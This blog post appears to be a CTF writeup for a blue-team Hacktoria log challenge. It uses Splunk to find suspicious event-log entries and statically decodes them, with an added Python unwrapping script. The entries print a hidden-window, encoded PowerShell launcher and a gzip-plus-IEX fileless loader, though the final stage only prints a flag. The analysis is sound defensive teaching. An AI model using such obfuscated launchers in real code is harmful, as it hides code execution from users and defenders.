Welcome to Mark's blog for Capture The Flag (CTF) enthusiasts

Tuesday, May 9, 2023

CTF Writeup: Hacktoria Contract: The Hunt for LOLbins

Introduction
While most of the CTF challenges on Hacktoria focus on OSINT, there have been a number of blue-team ones created by the community recently. After solving this , 
 
The challenge briefing on Hacktoria

Challenge Info
Name: The Hunt for LOLbins
Category: Log Files
Challenge Creator: BoΠeShΔdϴw³

Challenge description:

Greetings, Special Agent K.

Intelligence from our S.I.S.U unit tipped us off to a plot by Ahemait to infiltrate our systems. With the assistance of our Red Team and A.S.I.C units we were able to set up a “Honey Pot” before they attempted to breach us: we allowed a segregated portion of our network to be purposely infected by one of Ahemait’s USB sticks. Once they initiate a connection we can then trace them and reverse the code, modify it and then use their own malicious code against them. Your task is to trawl through the Event Logs and locate the suspicious entries, and then analyse and reverse them to work out what the final result is.

As always, Special Agent K. The Contract is yours, if you choose to accept.


Link to challenge files: https://hacktoria.com/contracts/the-hunt-for-lolbins/ (Contains backstory and challenge file: WinEvents.evtx)

Setup
WinEvents.evtx is a Windows Event Log file. You can view it (and use some limited searching functions) with the built-in Windows Event Viewer application that comes with every Windows computer.

However, I will be solving this challenge with the help of Splunk. There are a few advanced searching and visualization functions that can really speed up the analysis process. If you don't have a Splunk server yet, I've written a short Splunk setup guide.

For Splunk to be able to parse Windows Event Logs, you have to install the server on a Windows system. I recommend a Virtual Machine.

You can upload the evtx file using Splunk's web interface.

Check that the sourcetype is set to "preprocess-winevt". Don't worry if the logs look a little messed up at this stage.

Complete the remaining steps to finish importing the logs into Splunk.

Solving the challenge
In the CTF context, analyzing a log file typically takes two main steps:
  1. Identifying suspicious or anomalous log entries
  2. Extracting or decoding the data in those entries
I like to start by looking at a sample log entry, and noting down any interesting fields I can use in my search queries.

For Windows Event logs, the EventCode/Event ID shows the general category for each log entry.


Based on my past experience, Event ID 7001 is not very common. According to this Eventlog lookup website, it is only produced on Win2008 computers. From just the first log entry, we have already identified the machine's OS version.

The User and Computer fields are usually helpful, since they can help us map out the different computers and people in the network. In this case however, all logs came from a single machine, and there were no interesting usernames.
Finally, the SourceName field can reveal what applications or services were producing logs (and therefore were running) on the machine.
Listing the different SourceNames in the log file

SourceNames that include "Microsoft-Windows" are likely legitimate. However, one source, "BKyz", looks suspicious. Let's find out what event codes are associated with the BKyz SourceName.

All the events have the event code 1337. In CTFs, the number 1337 is another indicator that something is amiss. For a more detailed explanation of 1337's significance, check out this article.


Instead of modifying our Splunk search query, we can just click on the row and select "View events" to investigate the events from that source.


All 10 rows from the BKyz source include a suspicious encoded command:


%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand



Breaking down the key components of this command:
  1. %COMSPEC% is a Windows environment variable that points to (and would be replaced by) cmd.exe, the command prompt.
  2. "start" causes the command prompt to launch another program, in this case PowerShell.
  3. PowerShell opens in a hidden window (due to the -w hidden flag).
  4. -encodedcommand executes a base64-encoded string.
The next step in solving this challenge will be to reverse the encoded PowerShell command. One option would be to run the command in PowerShell and observe the output (for safety reasons, please do this in a virtual machine). However, I will try to reverse it statically (without executing the script), so I can point out a few common tricks.

Simply base64-decoding the string in CyberChef produces a few errors.

However, it can easily be fixed by converting to hex, filtering, and converting back.

The base64-encoded command decodes to:

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAMlPQmQA/31TwWqFMBC8B/IPC89iy6NgbFLr4UH/Q0SCWmuRCNGe2v67sZbiLKi3cSazk3G9UD02bTXN1s9SSBFZ7+lGr/cPgKSg8BT1u/Vllu6RAZTne6SSDKB63kP9gqTGowZ80Sh9OiZNchzPqOMAqFQJ2DCoIZyGS+N8NgOSogufj8FZGiDRh7Vx1g00fuoCvSGHt2ddYE784OyGMILFhr1BTqUh97asb4PtwrZG7nMY/rf3m+7oazuwCa5BUdHjx9g7imMpflZpMc2+d135K1lf/P0XrWsWrReP+iIDAAA="));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();


Here, we can see another base64-encoded string that is read by FromBase64String and then decompressed with IO.Compression.GzipStream; IEX then executes the resulting string as code. We can replicate this step in CyberChef as well.
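As an added example (not part of the original writeup), the same two-stage unwrapping done statically in Python. It takes the stage-1 command shown above exactly as decoded on this page; since the page's copy of the outer -encodedcommand string was elided, the wrapper is reconstructed from that stage for the demo. It goes one step beyond the writeup by reading the gzip header and trailer (MTIME and ISIZE) before inflating, and nothing is ever executed.

```python
import base64
import gzip
import re
import struct
import zlib
from datetime import datetime, timezone

# Stage 1 exactly as decoded on this page; the gzip blob is the page's own string.
STAGE1 = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("'
          'H4sIAMlPQmQA/31TwWqFMBC8B/IPC89iy6NgbFLr4UH/Q0SCWmuRCNGe2v67sZbiLKi3cSazk3G9UD02bTXN1s9SSBFZ7+lGr/cPgKSg8BT1u/Vllu6RAZTne6SSDKB63kP9gqTGowZ80Sh9OiZNchzPqOMAqFQJ2DCoIZyGS+N8NgOSogufj8FZGiDRh7Vx1g00fuoCvSGHt2ddYE784OyGMILFhr1BTqUh97asb4PtwrZG7nMY/rf3m+7oazuwCa5BUdHjx9g7imMpflZpMc2+d135K1lf/P0XrWsWrReP+iIDAAA='
          '"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream('
          '$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();')

# -encodedcommand carries base64 of the UTF-16LE script. The page's copy of the
# outer string was elided, so this wrapper is constructed from STAGE1 for the demo.
OUTER_B64 = base64.b64encode(STAGE1.encode("utf-16-le")).decode("ascii")

def decode_encodedcommand(b64: str) -> str:
    """Undo -encodedcommand: base64 -> UTF-16LE text. Nothing is executed."""
    return base64.b64decode(b64).decode("utf-16-le")

def extract_frombase64(script: str) -> bytes:
    """Pull out the literal passed to [Convert]::FromBase64String and decode it."""
    m = re.search(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', script)
    if not m:
        raise ValueError("no FromBase64String literal found")
    return base64.b64decode(m.group(1))

def inspect_gzip(blob: bytes) -> dict:
    """Parse the RFC 1952 header/trailer before inflating: MTIME is the time the
    payload was compressed, ISIZE the uncompressed size; then try to inflate."""
    if blob[:3] != b"\x1f\x8b\x08":
        raise ValueError("not a gzip member with deflate compression")
    mtime, = struct.unpack_from("<I", blob, 4)
    isize, = struct.unpack_from("<I", blob, len(blob) - 4)
    info = {"mtime": mtime, "isize": isize,
            "mtime_utc": datetime.fromtimestamp(mtime, timezone.utc).isoformat()}
    try:
        info["script"] = gzip.decompress(blob).decode("utf-8", errors="replace")
    except (OSError, EOFError, zlib.error) as exc:  # corrupted or truncated copy
        info["script"], info["error"] = None, repr(exc)
    return info

def unwrap(outer_b64: str) -> dict:
    return inspect_gzip(extract_frombase64(decode_encodedcommand(outer_b64)))

if __name__ == "__main__":
    r = unwrap(OUTER_B64)
    print(f"gzip MTIME {r['mtime_utc']}  ISIZE {r['isize']} bytes")
    print(r["script"] if r["script"] is not None else f"inflate failed: {r['error']}")
```

The header fields alone already tell a responder when the payload was built and how large the inflated stage is, even before the deflate stream is trusted.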

...
Click here to view the full output

Now, we can see that an array of characters is created, decoded, and printed out as the flag. Keeping with my aim of fully reversing the payload, one way of finding the flag is to re-implement the script in Python, or your favorite scripting language.

However, since we've had so much fun with CyberChef, let's decode it with CyberChef instead.
Click here to play around with the recipe

And we have our flag: H4ckt0ria{a24304dd-1209-4f2f-a926-a3a1140f3989}. Use this to unzip the flagfile, and we are rewarded with another cool challenge card. 


Conclusion
Thanks again to BoΠeShΔdϴw³ for creating this challenge. If you're interested in another blue team challenge from Hacktoria, check out my writeup for this Office Document forensics challenge. You can find all the log file challenges from Hacktoria here.

Update: My writeup was reviewed on the official Hacktoria YouTube channel! Watch this video to see Frank, founder of Hacktoria, go over community writeups for this challenge.